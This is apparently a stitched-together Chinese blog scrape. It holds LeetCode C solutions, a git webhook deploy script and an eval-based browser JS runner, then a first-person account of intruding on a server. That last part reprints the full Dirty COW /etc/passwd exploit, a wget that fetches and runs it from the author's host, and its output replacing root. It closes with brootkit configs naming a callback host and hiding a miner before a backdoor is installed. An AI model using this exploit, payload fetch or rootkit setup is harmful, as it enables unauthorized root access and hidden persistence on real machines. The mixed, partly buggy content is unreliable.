示例 1:
输入: 123
输出: 321
示例 2:
输入: -123
输出: -321
示例 3:
输入: 120
输出: 21假设我们的环境只能存储得下 32 位的有符号整数,则其数值范围为 [−231, 231 − 1]。请根据这个假设,如果反转后整数溢出那么就返回 0。
代码片段:
int reverse(int x){
int min=-2147483648,max=2147483647;
long res=0;
while(x!=0){
res = res*10+x%10;
x/=10;
}
return res>max || res<min ? 0:res;
}给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。
你可以假设每种输入只会对应一个答案。但是,你不能重复利用这个数组中同样的元素。
给定 nums = [2, 7, 11, 15], target = 9
因为 nums[0] + nums[1] = 2 + 7 = 9
所以返回 [0, 1]中规中矩的写法
/**
* Note: The returned array must be malloced, assume caller calls free().
*/
int* twoSum(int* nums, int numsSize, int target, int* returnSize){
int *result = (int*)malloc(sizeof(int) * 2);
result[0] = 0;
result[0] = 0;
for(int i=0;i<numsSize;i++){
for(int n=i+1;n<numsSize;n++){
if( nums[i] + nums[n] == target ){
result[0] = i;
result[1] = n;
*returnSize = 2;
return result;
}
}
}
return 0;
}之前写大部分只能针对一个项目来部署,这回改成多个项目自动部署。
#!/bin/bash
echo ""
#输出当前时间
date --date='0 days ago' "+%Y-%m-%d %H:%M:%S"
echo "Start"
#判断宝塔WebHook参数是否存在
if [ ! -n "$1" ];
then
echo "param参数错误"
echo "End"
exit
fi
#解析参数 例abc/efg
param="$1"
obj_user=${param%\/*}
obj_name=${param#*\/}
#git项目路径
gitPath="/www/wwwroot/we7.71yunduan.top/addons/$obj_name/"
if [ ! -d "$gitPath" ]; then
mkdir $gitPath
fi
#git 网址
gitHttp="git@gitlib.71yunduan.top:$obj_user/$obj_name.git"
echo "Web站点路径:$gitPath"
echo "Git项目地址:$gitHttp"
#判断项目路径是否存在
if [ -d "$gitPath" ]; then
cd $gitPath
#判断是否存在git目录
if [ ! -d ".git" ]; then
echo "在该目录下克隆 git"
git clone $gitHttp gittemp
mv gittemp/.git .
rm -rf gittemp
fi
#拉取最新的项目文件
git reset --hard origin/master
git pull
#设置目录权限
chown -R www:www $gitPath
echo "End"
exit
else
echo "该项目路径不存在"
echo "End"
exit
fi今天同学突然问我廖老的站立有个在输入框里输入js代码 就能像console里边一样的输出这里来段代码
<textarea id="code">console.log('123')</textarea>
<button onclick="exe()">t</button>
<div id="text"></div>
<script>
function exe(){
var t=document.getElementById('code').value
execute_javascript(t)
}
function execute_javascript(code) {
var code = code;
// var code = "";
(function () {
// prepare console.log
var
buffer = '',
_log = function (s) {
// console.log(s);
buffer = buffer + s + '\n';
},
_warn = function (s) {
// console.warn(s);
buffer = buffer + s + '\n';
},
_error = function (s) {
// console.error(s);
buffer = buffer + s + '\n';
},
_console = {
trace: _log,
debug: _log,
log: _log,
info: _log,
warn: _warn,
error: _error
};
try {
eval('(function() {\n var console = _console; \n' + code + '\n})();');
if (!buffer) {
buffer = '(no output)';
}
document.getElementById("text").innerHTML=buffer
}
catch (e) {
buffer = buffer + String(e);
}
})();
}
</script>这是最难的地方,在寻找提权的过程中我都有点想放弃了。
我在百度中寻找这各种方法,有的是SUID,有的是辅助提全工具(这是最坑的,找完之后也不好使,虽然说各种信息各种出)。而且很多都是关于win提权的。
在我打算放弃的时候还是去exploit-db上逛了逛,看看有没有0day这种漏洞存在,黄天不负有心人,终于让我给翻到了。。。。。。。
这东西名字说实话有点古怪,叫“Dirty COW”,说实话脏的一批,原本以为提权当前用户,没想到最脏的是把root删了。。。。
虽然是16年的漏洞,但是在这里,,,,,嘻嘻,,,都懂。 ---------Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)
其代码为
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}首先我是在本地编译的,
┌─[invisible@parrot]─[~]
└──╼ $gcc -pthread exp.c -lcrypt -o exploit
然后scp到自己的服务器。这样就方便命令下载了与执行了
在我的服务器中接受到反弹的www权限的shell之后就获取提权文件,然后放置到/tmp下去执行。。。。。
sh-4.1$ wget http://175.19.213.138:1024/vip_video/exploit
wget http://175.19.213.138:1024/vip_video/exploit
--2017-07-24 16:39:34-- http://175.19.213.138:1024/vip_video/exploit
Connecting to 175.19.213.138:1024... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14368 (14K)
Saving to: `exploit'
0K .......... .... 100% 455K=0.03s
2017-07-24 16:39:34 (455 KB/s) - `exploit' saved [14368/14368]
sh-4.1$ ls exploit
ls exploit
exploit
sh-4.1$ ls -l exploit
ls -l exploit
-rw-r--r-- 1 www www 14368 Jul 24 16:38 exploit
sh-4.1$ chmod +x exploit
chmod +x exploit接下来就是执行,说实话当时没想到会提权成功,而且结果还下了我一跳
sh-4.1$ ./exploit
./exploit
Please enter the new password: 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash
mmap: 7efcd4fd6000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd可以看到,直接提权成功之后就将root用户替换成firefart了,password也做了备份被放置在/tmp
然后扫了一下端口,22端口还是开放的,直接进。。。。。
之前用过rootkit,是利用加载模块的方式劫持内核函数,有点太高级,正在努力研究。。。。
这里就用brootkit吧,这个是纯脚本的。
配置文件就如下:
[17:12 j0 firefart@iZ25thvdau5Z:t2 ~/brootkit]#cat brsh.conf
cat brsh.conf
HIDE_PORT 22
HIDE_FILE br
HIDE_PROC sh,minerd
REMOTE_HOST invisiblegg.tpddns.cn
REMOTE_PORT 12346
SLEEP_TIME 60
[17:12 j0 firefart@iZ25thvdau5Z:t2 ~/brootkit]#cat br.conf
cat br.conf
#brootkit config file.
#
HIDE_PORT 8080,8899
HIDE_FILE br.conf,bashbd.sh,brootkit,.bdrc,brdaemon,wzt
HIDE_PROC bashbd,brootkit,pty.spawn,brdaemon,minerd
REMOTE_HOST invisiblegg.tpddns.cn
REMOTE_PORT 12346
SLEEP_TIME 60然后./install.sh放置后门走人